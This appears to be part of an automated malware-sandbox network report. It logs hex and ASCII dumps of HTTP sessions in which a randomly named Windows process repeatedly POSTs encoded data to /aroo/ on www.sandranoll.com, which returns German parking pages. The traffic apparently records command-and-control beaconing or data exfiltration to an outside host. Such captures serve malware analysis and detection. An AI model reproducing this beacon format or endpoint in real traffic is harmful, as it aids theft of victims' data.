Aug 9, 2024 08:42:57.475344896 CEST	1236	IN	Data Raw: 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c Data Ascii: 386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /
Aug 9, 2024 08:42:57.475354910 CEST	1236	IN	Data Raw: 34 37 2e 39 35 22 20 79 31 3d 22 35 35 31 2e 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32 3d 22 35 35 31 2e 37 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 47.95" y1="551.719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="186.359" y1=
Aug 9, 2024 08:42:57.475367069 CEST	776	IN	Data Raw: 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 35 30 2e 30 36 36 22 20 63 79 3d 22 33 32 30 2e 32 35 39 22 20 72 3d 22 37 2e 39 35 32 22 20 2f Data Ascii: nd" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="168.303" cy="353.753
Aug 9, 2024 08:42:57.475377083 CEST	1236	IN	Data Raw: 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c Data Ascii: /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width
Aug 9, 2024 08:42:57.475388050 CEST	1236	IN	Data Raw: 34 31 30 2e 39 36 39 63 30 2c 30 2d 35 34 2e 35 32 37 2c 33 39 2e 35 30 31 2d 31 31 35 2e 33 34 2c 33 38 2e 32 31 38 63 2d 32 2e 32 38 2d 30 2e 30 34 38 2d 34 2e 39 32 36 2d 30 2e 32 34 31 2d 37 2e 38 34 31 2d 30 2e 35 34 38 0a 09 09 09 63 2d 36 Data Ascii: 410.969c0,0-54.527,39.501-115.34,38.218c-2.28-0.048-4.926-0.241-7.841-0.548c-68.038-7.178-134.288-43.963-167.33-103.87c-0.908-1.646-1.793-3.3-2.654-4.964c-18.395-35.511-37.259-83.385-32.075-118.817" /> <path id="backpack" fi
Aug 9, 2024 08:42:57.475397110 CEST	1236	IN	Data Raw: 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 09 4d 33 36 30 2e 36 33 33 2c 33 36 33 2e 30 33 39 63 Data Ascii: inejoin="round" stroke-miterlimit="10" d="M360.633,363.039c1.352,1.061,4.91,5.056,5.824,6.634l27.874,47.634c3.855,6.649,1.59,15.164-5.059,19.02l0,0c-6.649,3.855-15.164,1.59-19.02-5.059l-5.603-9.663" />
Aug 9, 2024 08:42:57.480406046 CEST	1236	IN	Data Raw: 2d 35 2e 32 35 2d 32 2e 32 30 39 2d 31 31 2e 36 33 31 2c 31 2e 35 31 38 2d 31 35 2e 39 37 37 63 2d 32 2e 37 30 31 2d 30 2e 30 30 39 2d 35 2e 34 34 2c 30 2e 36 35 36 2d 37 2e 39 35 32 2c 32 2e 30 39 36 0a 09 09 09 09 63 2d 37 2e 36 31 39 2c 34 2e Data Ascii: -5.25-2.209-11.631,1.518-15.977c-2.701-0.009-5.44,0.656-7.952,2.096c-7.619,4.371-10.253,14.09-5.883,21.71c4.371,7.619,14.09,10.253,21.709,5.883c3.03-1.738,5.35-3.628,6.676-6.59C252.013,404.214,245.243,401.017,241.978,395.324z" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49749	213.145.228.16	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:03.115688086 CEST	785	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 212 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 38 2b 70 47 64 65 47 38 5a 70 73 32 46 4a 4d 37 64 68 78 39 31 7a 49 44 36 48 4d 53 59 4f 50 77 53 37 33 30 58 79 49 69 6c 51 64 6e 36 4b 47 61 70 77 76 64 4b 43 6e 47 48 49 4f 4e 58 54 65 69 63 30 73 47 56 67 75 57 44 44 34 36 76 2f 6c 42 73 67 6d 41 66 57 4f 48 57 6d 45 6d 6b 48 76 67 54 30 31 31 62 62 50 43 63 58 78 74 41 45 30 33 78 6a 32 31 4f 67 52 41 74 4c 56 5a 6a 4c 72 30 6a 41 72 43 66 43 6d 64 57 6b 38 64 51 63 6b 58 4e 76 70 6c 36 6f 5a 62 77 47 43 2b 6c 76 6d 71 4d 6f 30 2f 48 57 65 2f 38 67 46 43 68 73 6a 36 59 44 6d 75 36 6b 65 30 75 65 58 72 73 57 73 78 Data Ascii: _Z1XhZu=WIabGlVXn4l28+pGdeG8Zps2FJM7dhx91zID6HMSYOPwS730XyIilQdn6KGapwvdKCnGHIONXTeic0sGVguWDD46v/lBsgmAfWOHWmEmkHvgT011bbPCcXxtAE03xj21OgRAtLVZjLr0jArCfCmdWk8dQckXNvpl6oZbwGC+lvmqMo0/HWe/8gFChsj6YDmu6ke0ueXrsWsx
Aug 9, 2024 08:43:03.838857889 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:43:03 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED] Data Ascii: 49a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Aug 9, 2024 08:43:03.838890076 CEST	224	IN	Data Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">82b
Aug 9, 2024 08:43:03.838902950 CEST	1236	IN	Data Raw: 0a 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 3e 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 50 69 77 69 6b 20 53 74 61 74 69 73 74 69 6b 20 75 6e 64 20 57 65 62 61 6e 61 6c 79 73 65 20 53 6f 66 74 Data Ascii: <table><tr><td><table><tr><td colspan="2"><h2>Piwik Statistik und Webanalyse Software</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/pi
Aug 9, 2024 08:43:03.838917971 CEST	858	IN	Data Raw: 6c 65 78 69 62 69 6c 69 74 26 61 75 6d 6c 3b 74 20 75 6e 64 20 7a 61 68 6c 72 65 69 63 68 65 20 45 72 77 65 69 74 65 72 75 6e 67 65 6e 20 61 75 73 2e 20 47 61 6e 7a 20 65 69 6e 66 61 63 68 20 26 75 75 6d 6c 3b 62 65 72 20 49 68 72 20 48 6f 73 74 Data Ascii: lexibilität und zahlreiche Erweiterungen aus. Ganz einfach über Ihr Hosting Control Panel zu installieren. </td></tr></table></td><td><table><tr><td colspan="2"><h2>Das Domaintechnik.at Affiliate Programm</h2></td></tr><tr><td style=
Aug 9, 2024 08:43:03.842473984 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49750	213.145.228.16	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:05.655846119 CEST	809	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 236 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 34 33 77 53 65 4c 30 46 7a 49 69 6d 51 64 6e 78 71 47 62 74 77 76 57 4b 46 75 6d 48 4a 69 4e 58 53 36 69 63 30 38 47 55 58 36 56 52 44 34 30 32 76 6c 44 68 41 6d 41 66 57 4f 48 57 6c 34 41 6b 42 48 67 54 6c 46 31 61 36 50 64 55 33 78 75 44 45 30 33 37 44 32 78 4f 67 51 56 74 4b 4a 7a 6a 4a 6a 30 6a 46 50 43 66 33 4b 63 63 6b 39 55 55 63 6c 6e 48 50 4a 31 38 5a 73 2f 76 31 65 36 79 50 53 53 4e 65 31 6c 62 6c 65 63 75 77 6c 41 68 75 37 49 59 6a 6d 45 34 6b 6d 30 38 4a 62 4d 6a 69 4a 53 5a 41 78 45 59 79 55 7a 65 57 48 61 5a 45 57 57 72 34 30 48 55 67 3d 3d Data Ascii: _Z1XhZu=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b43wSeL0FzIimQdnxqGbtwvWKFumHJiNXS6ic08GUX6VRD402vlDhAmAfWOHWl4AkBHgTlF1a6PdU3xuDE037D2xOgQVtKJzjJj0jFPCf3Kcck9UUclnHPJ18Zs/v1e6yPSSNe1lblecuwlAhu7IYjmE4km08JbMjiJSZAxEYyUzeWHaZEWWr40HUg==
Aug 9, 2024 08:43:06.369390011 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:43:06 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 63 37 66 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 [TRUNCATED] Data Ascii: ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>c7fDomain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitu
Aug 9, 2024 08:43:06.369410038 CEST	1236	IN	Data Raw: 6e 67 65 6e 20 65 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 Data Ascii: ngen einrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><tab
Aug 9, 2024 08:43:06.369426966 CEST	1213	IN	Data Raw: 65 6e 20 69 6d 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 26 72 65 67 3b 20 48 6f 73 74 69 6e 67 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a Data Ascii: en im Domaintechnik® Hosting Control Panel</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png" alt="Datenbanken" /></td><td styl
Aug 9, 2024 08:43:06.374473095 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49751	213.145.228.16	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:08.187313080 CEST	1822	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1248 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 37 58 77 53 73 7a 30 47 55 63 69 6e 51 64 6e 38 4b 47 65 74 77 76 4c 4b 45 4b 71 48 4a 2f 32 58 51 79 69 65 58 6b 47 46 56 43 56 4c 54 34 30 2b 50 6c 47 73 67 6d 76 66 57 65 44 57 6c 6f 41 6b 42 48 67 54 6d 64 31 63 72 50 64 53 33 78 74 41 45 30 7a 78 6a 32 56 4f 67 35 75 74 4b 4e 4a 67 39 76 30 6a 6c 2f 43 64 68 65 63 42 55 39 57 5a 38 6c 2f 48 50 45 79 38 5a 41 64 76 32 43 63 79 49 36 53 4d 61 6f 76 42 78 43 2f 31 47 68 68 39 73 36 7a 55 6e 4b 50 79 55 6d 75 79 4b 58 4d 69 41 56 46 53 30 31 42 51 30 64 48 55 32 71 30 56 53 48 44 71 62 4a 64 41 73 31 59 78 53 51 6a 74 32 78 4d 4c 6f 71 35 75 6c 36 54 73 62 37 44 4e 45 74 67 4f 58 58 4d 68 72 43 56 4a 34 71 55 45 50 4e 52 31 31 47 6e 41 69 48 53 63 4f 37 52 59 50 42 51 31 5a 78 30 4c 58 39 65 4f 52 41 4b 63 39 32 73 51 55 71 6d 79 4b 6a 42 79 2b 50 74 4a 47 65 32 65 4f 34 74 39 5a 6b 6d 50 47 31 30 46 64 [TRUNCATED] Data Ascii: _Z1XhZu=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b7XwSsz0GUcinQdn8KGetwvLKEKqHJ/2XQyieXkGFVCVLT40+PlGsgmvfWeDWloAkBHgTmd1crPdS3xtAE0zxj2VOg5utKNJg9v0jl/CdhecBU9WZ8l/HPEy8ZAdv2CcyI6SMaovBxC/1Ghh9s6zUnKPyUmuyKXMiAVFS01BQ0dHU2q0VSHDqbJdAs1YxSQjt2xMLoq5ul6Tsb7DNEtgOXXMhrCVJ4qUEPNR11GnAiHScO7RYPBQ1Zx0LX9eORAKc92sQUqmyKjBy+PtJGe2eO4t9ZkmPG10Fdt0ZYaUQYwS9WNYPwtzqYqtVMNdxQhDFsM66C4aDKQ1HTUQuah3yfC/VSpr3EVfwD/YA3zHunVwdyOZznVyZ32fQ/TxYywhLNb41YVK64nTYhzF34PpId29VF1wbMI/Im/OjcV2G7GnhQZYPCNQQwFhUFbd4HktAxjgv+zxeyiVXNJJ7tLN404Q3l6gXUQIeKjFgA+UAVJMmIfuFkckKUITX6aYOc5IoZy/iOdNrkil1MZq2XUMeczZSVkgSqMEsO8Uc5o4HD+qYYzOm/CfzKbjbYFu/LIB2qokjHW8GvIJzDS1XA7I2X6QY9Oz3BlnABKUQsKgcM+TC3Z5LAzVXEBR5nVihfx2HFzv1Eepy5Ywc9Lr2Ij1tSj8TN+aSotaY+Jv9+mJ/vPf8jUKasWfABQedrAfSqIsUZVnteOHMyBcVymboLozF9qnIrWob1hFPim/j3X4YpdGk3VZOOeM5kOZjoxVZ48o1B6VrRBZ6wNYq93Asy4Zqvb2Oqvsxk9hBNKI6mVkZLM6IIK1m/5gi4sToRSQHXTja8E3165eLBpZ3GxJLybVxidxwKlIXl1ByRw7yrZDkGJkJkTkS4zk+dpydOKlsTXGuEUrNb0UCHbDu5d+sle/oDS+LNglx1O+Vk16emeG2tdldXtEntWaDz3zncM9bLIswMw2 [TRUNCATED]
Aug 9, 2024 08:43:09.105014086 CEST	479	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:43:08 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a Data Ascii: ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>
Aug 9, 2024 08:43:09.105051994 CEST	1236	IN	Data Raw: 63 32 33 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 Data Ascii: c23Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" hr
Aug 9, 2024 08:43:09.105062008 CEST	1236	IN	Data Raw: 64 70 72 65 73 73 2e 70 6e 67 22 20 61 6c 74 3d 22 57 6f 72 64 70 72 65 73 73 22 20 2f 3e 3c 2f 74 64 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 22 3e 57 6f 72 64 50 72 65 73 73 20 69 73 74 20 65 69 6e 20 7a 65 69 74 Data Ascii: dpress.png" alt="Wordpress" /></td><td style="width:300px;">WordPress ist ein zeitgemäßes Weblog-System für Ihr Web Hosting Paket zum Veröffentlichen persönlicher Beiträge - den Schwerpunkt bilden Ästhetik,
Aug 9, 2024 08:43:09.105072021 CEST	642	IN	Data Raw: 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 4d 65 64 69 61 20 57 69 6b 69 20 53 6f 66 74 77 61 72 65 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 Data Ascii: <tr><td colspan="2"><h2>Media Wiki Software</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/mediawiki.png" alt="MediaWiki" /></td><td sty
Aug 9, 2024 08:43:09.105079889 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49752	213.145.228.16	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:10.719718933 CEST	521	OUT	GET /aroo/?f6Gp=VzB4OR5&_Z1XhZu=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG3kGwJkz3gG7EkbGSmwaxQucCWgWcruhZkgDOmNZxE+MWhMf5t0= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.sandranoll.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 9, 2024 08:43:11.420634985 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:43:11 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 